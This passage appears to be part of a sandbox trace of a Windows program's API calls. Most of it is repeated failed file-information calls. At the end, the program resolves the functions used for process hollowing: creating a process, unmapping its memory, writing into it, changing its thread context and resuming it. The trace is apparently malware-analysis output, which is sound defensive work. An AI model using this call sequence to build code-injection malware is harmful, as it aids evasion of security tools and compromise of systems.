lpFileInformation=0x18fe80) returned 0 [0101.989] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.989] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.990] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.990] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.990] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.990] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.990] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.990] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.990] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.990] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.991] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.991] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.996] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.996] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.996] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.996] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.996] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.996] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.997] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.998] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.998] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.998] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.998] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.998] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.998] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.998] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.998] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.999] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.999] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.999] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.999] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.999] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.999] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.999] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.999] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.000] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.000] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.000] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.000] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.000] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.000] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.000] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.000] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.001] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.001] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.001] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.001] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.001] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.001] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.001] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.001] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.002] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.002] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.002] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.002] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.006] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.006] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.006] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.006] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.006] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.006] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.006] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.007] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.007] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.007] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.007] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.007] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.007] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.007] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.007] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.008] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.008] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.008] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.008] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.008] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.008] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.008] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.008] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.009] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.009] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.009] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.009] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.009] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.009] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.009] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.009] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.010] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.010] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.010] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.010] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.010] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.010] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.010] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.011] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.011] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.011] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.011] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.011] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.011] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.011] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.011] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.012] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.012] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.012] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.012] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.012] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.012] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.012] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.012] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.013] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.013] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.013] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.013] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.013] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.013] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.013] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.013] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.014] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.014] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.014] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.014] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.014] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.014] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.014] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.014] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.015] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.015] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.015] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.015] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.015] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.015] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.015] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.015] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.016] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.016] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.016] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.016] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.016] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.016] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.016] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.016] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.017] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.017] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.017] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.017] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.017] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.017] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.017] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.017] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.018] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.018] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.018] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.018] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.018] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.018] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.018] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.018] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.019] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.019] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.019] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.019] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.019] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.019] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.019] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.019] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.020] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.020] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.020] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.020] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.020] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.020] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.020] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.020] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.021] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.021] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.021] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.021] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.021] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.021] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.021] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.022] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.022] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.022] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.022] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.022] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.022] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.022] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.022] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.023] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.023] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.023] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.023] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.023] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.023] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.023] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.023] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.024] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0102.024] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0104.669] GetProcAddress (hModule=0x75c60000, lpProcName="MessageBoxA") returned 0x75ccfd1e [0104.669] GetProcAddress (hModule=0x75c60000, lpProcName="GetMessageExtraInfo") returned 0x75c9ed76 [0104.669] LoadLibraryA (lpLibFileName="kernel32") returned 0x756c0000 [0104.670] GetProcAddress (hModule=0x756c0000, lpProcName="WinExec") returned 0x75752c21 [0104.670] GetProcAddress (hModule=0x756c0000, lpProcName="CreateFileA") returned 0x756d53c6 [0104.670] GetProcAddress (hModule=0x756c0000, lpProcName="WriteFile") returned 0x756d1282 [0104.670] GetProcAddress (hModule=0x756c0000, lpProcName="CloseHandle") returned 0x756d1410 [0104.670] GetProcAddress (hModule=0x756c0000, lpProcName="CreateProcessA") returned 0x756d1072 [0104.670] GetProcAddress (hModule=0x756c0000, lpProcName="GetThreadContext") returned 0x756f79d4 [0104.670] GetProcAddress (hModule=0x756c0000, lpProcName="VirtualAlloc") returned 0x756d1856 [0104.671] GetProcAddress (hModule=0x756c0000, lpProcName="VirtualAllocEx") returned 0x756ed9b0 [0104.671] GetProcAddress (hModule=0x756c0000, lpProcName="VirtualFree") returned 0x756d186e [0104.673] GetProcAddress (hModule=0x756c0000, lpProcName="ReadProcessMemory") returned 0x756ecfcc [0104.673] GetProcAddress (hModule=0x756c0000, lpProcName="WriteProcessMemory") returned 0x756ed9e0 [0104.673] GetProcAddress (hModule=0x756c0000, lpProcName="SetThreadContext") returned 0x75755393 [0104.673] GetProcAddress (hModule=0x756c0000, lpProcName="ResumeThread") returned 0x756d43ef [0104.673] GetProcAddress (hModule=0x756c0000, lpProcName="WaitForSingleObject") returned 0x756d1136 [0104.674] GetProcAddress (hModule=0x756c0000, lpProcName="GetModuleFileNameA") returned 0x756d14b1 [0104.674] GetProcAddress (hModule=0x756c0000, lpProcName="GetCommandLineA") returned 0x756d51a1 [0104.674] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77850000 [0104.674] GetProcAddress (hModule=0x77850000, lpProcName="NtUnmapViewOfSection") returned 0x7786fc70 [0104.674] GetProcAddress (hModule=0x77850000, lpProcName="NtWriteVirtualMemory") returned 0x7786fe04 [0104.674] GetProcAddress (hModule=0x75c60000, lpProcName="RegisterClassExA") returned 0x75c7db98 [0104.674] GetProcAddress (hModule=0x75c60000, lpProcName="CreateWindowExA") returned 0x75c7d22e [0104.674] GetProcAddress (hModule=0x75c60000, lpProcName="PostMessageA") returned 0x75c83baa [0104.675] GetProcAddress (hModule=0x75c60000, lpProcName="GetMessageA") returned 0x75c77bd3 [0104.675] GetProcAddress (hModule=0x75c60000, lpProcName="DefWindowProcA") returned 0x778924e0 [0104.675] GetProcAddress (hModule=0x756c0000, lpProcName="GetFileAttributesA") returned 